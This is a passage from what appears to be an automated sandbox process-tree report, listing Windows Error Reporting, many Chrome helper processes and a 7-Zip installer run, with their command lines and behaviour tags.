- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4372
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1528
  2⤵
  - Program crash
  PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5572 -ip 5572
1⤵
PID:4384

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:7392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd1f11dcf8,0x7ffd1f11dd04,0x7ffd1f11dd10
  2⤵
  PID:7408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1952,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=2080 /prefetch:3
  2⤵
  - Mark of the Web detected: This indicates that the page was originally saved or cloned.
  PID:7376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=2044 /prefetch:2
  2⤵
  PID:7624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=2408 /prefetch:8
  2⤵
  PID:6916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=1968,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:6848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:6860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4572 /prefetch:1
  2⤵
  PID:7476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4432,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4488 /prefetch:8
  2⤵
  PID:7492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3528,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4888 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4480,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5056 /prefetch:1
  2⤵
  PID:9236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5196,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5212 /prefetch:1
  2⤵
  PID:2228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5220,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5380 /prefetch:1
  2⤵
  PID:9640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5520,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5560,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5676 /prefetch:1
  2⤵
  PID:9356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5820,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5980,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6012 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5200,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:9164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6684,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6720 /prefetch:1
  2⤵
  PID:9764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6676,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5968 /prefetch:8
  2⤵
  PID:1928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6960,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6972 /prefetch:1
  2⤵
  PID:7924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6180,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7072 /prefetch:1
  2⤵
  PID:9860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6208,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6460 /prefetch:1
  2⤵
  PID:1524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=7308,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7332 /prefetch:1
  2⤵
  PID:9864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=7472,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:1488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7488,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7636 /prefetch:1
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7776,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7792 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=3208,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4832 /prefetch:1
  2⤵
  PID:6724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=3272,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3056 /prefetch:1
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=8256,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=8276 /prefetch:1
  2⤵
  PID:2416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=4892,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9752 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7340,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7420 /prefetch:1
  2⤵
  PID:9032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5708,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6520 /prefetch:8
  2⤵
  PID:7824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5344,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5164 /prefetch:8
  2⤵
  PID:9728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5184,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6528 /prefetch:8
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=6392,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4908 /prefetch:1
  2⤵
  PID:7204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=7512,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9744 /prefetch:1
  2⤵
  PID:6440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3904,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4964 /prefetch:1
  2⤵
  PID:8176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=10196,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4996 /prefetch:1
  2⤵
  PID:8096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=10264,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9844 /prefetch:1
  2⤵
  PID:8180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=10568,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7400 /prefetch:8
  2⤵
  PID:8156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=7064,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4868 /prefetch:1
  2⤵
  PID:10100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=10768,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9784 /prefetch:8
  2⤵
  PID:6328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=4496,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4676 /prefetch:1
  2⤵
  PID:6976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=10692,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=10624 /prefetch:1
  2⤵
  PID:7536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=9952,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=7332 /prefetch:1
  2⤵
  PID:8224
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"
  2⤵
  - Enumerates connected drives
  PID:8132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=9472,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9900 /prefetch:1
  2⤵
  PID:8712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=9648,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4436 /prefetch:1
  2⤵
  PID:1068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=10588,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5156 /prefetch:1
  2⤵
  PID:6276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=6596,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:10228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=8040,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6580 /prefetch:1
  2⤵
  PID:10052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=7048,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:7848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=10272,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9744 /prefetch:1
  2⤵
  PID:2368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=6196,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=9556 /prefetch:1
  2⤵
  PID:7164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=5604,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:7620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=5192,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=4636 /prefetch:1
  2⤵
  PID:692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=10612,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:5384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=9636,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:2816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=6492,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6564 /prefetch:1
  2⤵
  PID:9656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=7576,i,1266475626523213187,17758963640926153566,262144 --variations-seed-version=20250414-050123.764000 --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:5372
